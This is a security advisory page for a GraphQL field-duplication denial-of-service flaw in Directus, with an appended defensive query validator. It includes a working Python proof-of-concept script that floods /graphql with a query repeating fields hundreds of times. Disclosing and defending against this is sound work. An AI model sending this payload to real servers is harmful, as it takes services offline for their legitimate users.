GHSA-7hmh-pfrp-vcx4

Source
https://github.com/advisories/GHSA-7hmh-pfrp-vcx4
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/07/GHSA-7hmh-pfrp-vcx4/GHSA-7hmh-pfrp-vcx4.json
JSON Data
https://api.test.osv.dev/v1/vulns/GHSA-7hmh-pfrp-vcx4
Aliases
Related
Published
2024-07-08T18:41:00Z
Modified
2024-11-18T16:26:50Z
Severity
  • 6.5 (Medium) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
  • 7.1 (High) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
Summary
Directus GraphQL Field Duplication Denial of Service (DoS)
Details

Summary

A denial of service (DoS) attack by field duplication in GraphQL is a type of attack where an attacker exploits the flexibility of GraphQL to overwhelm a server by requesting the same field multiple times in a single query. This can cause the server to perform redundant computations and consume excessive resources, leading to a denial of service for legitimate users.

Details

Requests to the endpoint /graphql are sent when visualizing graphs generated on a dashboard.

By modifying the data sent and duplicating the fields many times, a DoS attack is possible.

PoC

The goal is to create a payload that generates a body like this, where the 'max' field is duplicated many times, each with the 'id' field duplicated many times inside it:

```
{'query': 'query { query_4f4722ea: test_table_aggregated { max {id id id id id id id id id id } max {id id id id id id id id id id } max {id id id id id id id id id id } max {id id id id id id id id id id } max {id id id id id id id id id id } max {id id id id id id id id id id } max {id id id id id id id id id id } max {id id id id id id id id id id } max {id id id id id id id id id id } max {id id id id id id id id id id } } }'}
```

Although that payload seems harmless, a bigger one leaves the service unresponsive.

The following code might serve as a PoC written in Python3:

```python
# Field Duplication DoS
# GitHub @asantof

import requests

# CHANGE THESE VALUES: url, auth_token, query_name, collection_name
url = 'http://0.0.0.0:8055/graphql'
auth_token = ''
query_name = 'queryXXXXX'
collection_name = ''

headers = {
    'Content-Type': 'application/json',
    'Authorization': f'Bearer {auth_token}',
}

# 'id' repeated 200 times inside each 'max' block; the 'max' block itself repeated 200 times
id_payload = 'id ' * 200
max_payload = 'max {' + id_payload + ' } '
full_payload = max_payload * 200

data = {
    'query': 'query { ' + query_name + ': ' + collection_name + '_aggregated { ' + full_payload + ' } }'
}

print(data)

response = requests.post(url, headers=headers, json=data)

print(response.json())
```

After running it the service will be unresponsive for a while.

Impact

The vulnerability impacts the service's availability by causing it to become unresponsive for a few minutes. An attacker could continuously send this request to the server, rendering the service unavailable indefinitely.
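As an added defensive example (not part of the advisory and not Directus code): a pre-validation step that tokenizes a GraphQL request body, counts how many times one field is selected within a single selection set, and rejects bodies shaped like the one above before they are forwarded to /graphql. The sample query, the `max_field_repeats`/`should_reject` names and the repeat limit are constructed assumptions.

```python
import re
from collections import Counter

# Constructed sample shaped like the advisory's body: 'max' repeated,
# each with 'id' repeated inside it (small counts; the PoC uses 200).
SAMPLE_QUERY = (
    "query { query_4f4722ea: test_table_aggregated { "
    + "max { id id id id id } " * 3
    + "} }"
)

# Tokens: string literals kept whole (so a '{' inside a string argument is
# not taken for a selection set), names, punctuators, anything else.
TOKEN = re.compile(r'"(?:\\.|[^"\\])*"|[A-Za-z_]\w*|[{}():]|\S')
NAME = re.compile(r"[A-Za-z_]\w*")

def max_field_repeats(query: str) -> int:
    """Highest number of times one field name is selected inside a single
    selection set. Alias labels (alias: field) are not counted, the field
    after the colon is; argument lists in parentheses are skipped."""
    stack = [Counter()]            # one Counter per open selection set
    worst = 0
    tokens = TOKEN.findall(query)
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        if tok == "{":
            stack.append(Counter())
        elif tok == "}" and len(stack) > 1:
            stack.pop()
        elif tok == "(":               # skip arguments, including nested ()
            depth = 1
            while depth and i + 1 < len(tokens):
                i += 1
                depth += (tokens[i] == "(") - (tokens[i] == ")")
        elif NAME.fullmatch(tok) and len(stack) > 1:
            if i + 1 < len(tokens) and tokens[i + 1] == ":":
                pass                   # alias label; the field follows ':'
            else:
                stack[-1][tok] += 1
                worst = max(worst, stack[-1][tok])
        i += 1
    return worst

def should_reject(query: str, limit: int = 5) -> bool:
    """True when any selection set repeats one field more than `limit`
    times (limit is an assumed policy value, tune it per deployment)."""
    return max_field_repeats(query) > limit
```

A query rejected here never reaches the resolver, so the redundant computation the advisory describes is not performed; legitimate dashboard queries select each aggregate field once and pass unchanged.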

Database specific
{
    "nvd_published_at": "2024-07-08T17:15:11Z",
    "cwe_ids": [
        "CWE-400"
    ],
    "severity": "HIGH",
    "github_reviewed": true,
    "github_reviewed_at": "2024-07-08T18:41:00Z"
}
References

Affected packages

npm / @directus/env

Package

Name
@directus/env
Purl
pkg:npm/%40directus/env

Affected ranges

Type
SEMVER
Events
Introduced
0 (unknown introduced version / all previous versions are affected)
Fixed
1.1.6